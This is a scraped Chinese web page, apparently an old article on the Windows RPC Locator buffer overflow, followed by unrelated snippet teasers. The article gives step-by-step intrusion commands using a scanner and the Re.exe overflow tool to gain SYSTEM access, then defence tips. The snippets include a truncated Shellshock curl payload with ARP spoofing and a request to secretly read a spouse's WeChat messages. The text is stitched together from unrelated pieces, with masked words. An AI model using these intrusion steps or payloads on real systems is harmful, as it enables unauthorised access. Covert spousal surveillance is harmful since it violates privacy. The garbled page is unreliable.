小编我更爱看武侠小说了,常常看到作者这么形容一个有才华的大将:一将功成万古枯!看看案头这关于RPC蠕虫对全球经济的影响和该漏洞在漏洞领域的地位后,不由的就联系到一起了。 RPC漏洞简介: Windows PRC Locator服务是一款映射逻辑名称到 *** 特定名称的名字 服务。客户端使用RPC(remote procedure call)远程过程调用Locator服务,Locator服务 负责把客户提交的 *** 名解析转换为硬盘,打印机等计算机系统上实际资源的地址。如果某一个打印机服务器逻辑名为"laserprinter",RPC客户端调用 Locator服务来找出 *** 名所映射的"laserprinter",RPC客户端在调用RPC服务的时候使用 *** 名来提交请求。 不过Locator服务在接收注册信息的时候没有对Locator服务的参数进行详细检查,超长超大的参数可以导致服务程序触发缓冲区溢出,使Locator服务崩溃,精心构建提交数据可能以Locator服务进程的权限在系统上执行任意指令,而且攻击者获取的是system权限。 默认情况下Windows 2000域控制器上Locator服务是默认运行,而一般的windows工作站和服务器是默认是不开始这个服务,但是如果这些操作系统一旦启动了Locator服务就也存在着此漏洞。 攻击工具: 扫描工具:Locator Scanner(一个专门用来扫描此漏洞的命令行下运行的扫描程序,可以用它来扫描开放了RPC Locator服务的主机,要注意的是Locator Scanner只能扫描C 类 *** 地址。) 溢出程序:Re.exe 简单入侵: 1. 进入控制台模式(cmd模式):使用命令:rpc 192.168.0.1 192.168.0.254 这样我们就找到了一个开放了Locator Service的主机,该主机的地址是:192.168.0.2。 提示:Locator Scanner的用法是: C:\>rpc IPAddress-Start IPAddress-End IPAddress-Start :扫描开始的IP地址 IPAddress-End:扫描结束的IP地址 2. 使用RPC的专用溢出工具进行溢出,其溢出后得到的权限是system权限。 使用命令:re -h 192.168.0.2 至此攻击入侵结束! 如何防御: 如果你的计算机不是windows *** 的域控制器,那强烈建议你不要使用locator服务,如果已经开放了就关闭此服务,如何关闭Windows Locator服务是否运行,在Windows 2000和Windows XP系统下,打开“控制面板-管理工具-服务”查看 Remote procedure call(RPC)Locator服务是否启动,如果已经启动可以停止它,并将RPC Locator服务状态设置为“禁用”。 如果确实需要locator服务,那请尽快打上补丁。
请问如何查看我老公删除的微信聊天记录怎么偷偷的查看我老公的微信聊天记录 去哪个网站租房是很多人关注的问题。现在租房已经成为许多城市移民的生活方式 。随着网络功能的不断发展和扩大,通过网站租房已经...
估量明小子,发掘鸡就能够了1. 对方针主机进行ARP诈骗,宣称自己是网关。 print ?n?;Bash缝隙为什么可以履行19 curl -A "() { :;}; /b...
九个靠谱靠谱兼职服务平台,轻松帮你还贷款。 1.【蚂蚁微客】是一个领跑、对外开放、多元化的共享经济模式服务平台,根据客户的部位、个人信用及其数据分析的优化算法,将人与每日任务的开展一个智能化配对。简易...
别人冒用自己的身份信息办理手机卡,可以去工信网投诉吗 1、你好很乐意效劳,你可以要求移动公司给个说法,投诉他们监管不严,但是违法的是冒用你身份信息的人,你可以起诉冒用你身份信息的人,可以要求他赔偿相关...
是否有什么赚钱快还多的手机游戏(真正能赚钱的游戏)1、创造与魔法《创造与魔法》是能够随意交易而且能摆地摊的最典型性的手游游戏,而且游戏里面生意人十分多。在游戏玩法上结合了人物角色探险,休闲娱乐培养...
烤箱骨肉相连(自制骨肉相连,味道不比外卖差) 自制骨肉相连,味道不比外卖差! 骨肉相连并不是什么形容词,而是一种食品,说的是肉和筋骨相连的部分,算是鸡肉的一种,由于是含有脆骨的部分,所以吃起来的口...